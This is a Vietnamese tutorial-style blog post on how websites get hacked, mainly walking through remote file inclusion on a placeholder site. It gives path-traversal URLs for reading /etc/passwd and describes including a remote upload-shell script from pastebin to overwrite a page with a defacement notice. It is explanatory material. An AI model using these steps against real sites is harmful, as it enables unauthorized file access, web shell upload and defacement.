Các hacker đã hack trang web như nào ?

Các hacker đã hack trang web như nào ?

Lượt xem: 4571
Đa số mọi người đã từng thấy 1 trang web bị hack và thay đổi giao diện là anonymous, hacked by abc, ...... Vậy làm thế nào các hacker có thể làm được điều đó?
Cho tới hiện tại mình biết được 3 cách:
  1. Remote File Include (RFI)
  2. SQL injection.
  3. Cross-site Scripting.
Đặc điểm cả 3 đều thực hiện Upload Shell hay còn gọi là tải file độc hại lên sever thậm chí php, html, js, .....Đầu tiên ta đi đến cách đầu tiên: Remote File Include (RFI)
  • Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp tin độc hại bằng cách sử dụng chức năng “include”.
  • Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dự liệu độc hại.
Nói lý thuyết suông thì khá mơ hồ, các bạn xem video này sẽ tái hiện lại một cách chi tiết nhé: https://www.youtube.com/watch?v=D23yGtv3ZUY&feature=youtu.be
Ví dụ ta có site: abc. com/index.php?page=photos.php
Giải thích như sau: cái trang php kia sẽ đọc file từ photos.php mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ lợi dụng lỗ hổng này để khai thác và đọc nhiều file nhạy cảm hơn password
Đến đây ta thử thành đường dẫn google xem như nào.
abc. com/index.php?page=http:// google.com
Tada! Hiện ra nguyên trang search google luôn.
Vậy là index.php không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd
abc. com/index.php?page=etc/passwd
Kết quả không show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng ../
abc. com/index.php?page=../etc/passwd
Vẫn không hiện. Tiếp tục path.
abc. com/index.php?page=../../etc/passwd
Tada! Nguyên passwd đã lộ ra sau 2 lần thử . 
 
Chưa dừng lại ở đây. Nếu có thể đọc được bất kì file gì. Sao ta lại không thử đọc 1 file với mục đích upload file lên sever. Chuẩn bị 1 file uploadShell.php. Copy code vào pastebin nhằm mục đích lấy link. Sau 1 hồi ta được 1 link với code php để upload file.
Sau 1 hồi ta được kết quả:
abc. com/index.php?page=https:// pastebin. com/xyz
Ok up file đã hiện lên!

Giờ chỉ cần tới công đoạn up file bất kì nào lên thôi tùy mục đích của hacker.
Trong video mình muốn ghi đè file dispo_cal.php nên mình đã tạo 1 file php với tên y chang nhưng source code là trang web giao diện thông báo trang web này đã bị hack.
Và cuối cùng thành công! Hoàn thành thử thách.
 
Chia sẻ Nguyễn Quốc Khánh - J2Team

Block blog

Không biết gì vẫn có thể thiết kế web sau 3 giờ

Khóa học thiết kế web, blog và landing page dành cho startup, marketer, designer và developer